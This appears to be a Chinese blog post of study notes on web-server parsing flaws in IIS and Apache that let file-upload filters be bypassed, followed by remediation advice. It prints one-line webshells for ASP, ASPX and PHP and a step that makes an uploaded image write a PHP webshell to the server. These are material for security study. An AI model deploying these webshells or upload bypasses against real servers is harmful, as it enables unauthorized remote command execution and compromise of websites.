中间件解析漏洞

上传漏洞

常见中间件
	IIS
	解析漏洞:
		目录解析(IIS 5.x/6.0)
			/xx.asp/xx.jpg	将jpg按照asp解析
			/xx.asp/xx.*
		文件解析
			xx.asp;.jpg	分号前的后缀视为不见
		默认解析(IIS 6.0)		黑名单是可能被忽略
			/wooyun.asa	进行访问
			/wooyun.cer	进行访问
			/wooyun.cdx	对文件的下载(和浏览器有关,QQ浏览器可以解析)
		畸形解析(IIS 7.0/7.5)
			备注:可以在url目录遍历中发现有fckeditor即可判断有上传权限,可以尝试上传漏洞攻击
			利用条件:
				Fast-CGI开启	黑盒只管尝试
					phpinfo.php 可以看
			1.上传sp.jpg,内容为:
				<?php fputs(fopen('shell.php','w')
				,<?php eval($_POST[cmd])?>');?>
			2.访问sp.jpg,在这个目录下就会生成一句话木马shell.php
			
			3.最后再拿软件连接后台

	Nginx		加载java代码
	Apache		加载php
		解析漏洞:
			原理:从右到左开始判断解析,如果识别不可解析,就再往左判断
			          Apache解析后缀phtml,pht,php3,php4和php5,,都是按照php解析(这些上传都可以绕过黑名单)
			
	weblogic		


一句话木马:
	asp:	<%eval request("pass)%>
	aspx:	<%@ Page Language%><%eval(Request.Item["pass"]."unsafe):%>
	php:	<?php @eval($_POST['pass']);?>

	MIME:
		常见类型:
			JPEG类型		image/jpeg	.jpeg/.jpg
			超文本标记语言	.html/.htm	text/html
			TAR文件		.tar		application/x-rar
			下载文件类型	.exe		application/octet-stream

修复方案:
	1.白名单检查文件扩展名,不属于白名单内的,不允许上传
	2.上传文件的保存目录不可解析jsp,php等脚本语言
		apache:
			1.找到配置文件httpd.conf
			2.<Directory "c:/wwwroot/shangchaun/upload">
				AllowOverride None
				Options None
				Order allow,deny
				Deny from all
			   </Directory>
			3.重启apache服务

	3.文件名随机命名,不允许用户自定义
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凉水沏茶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值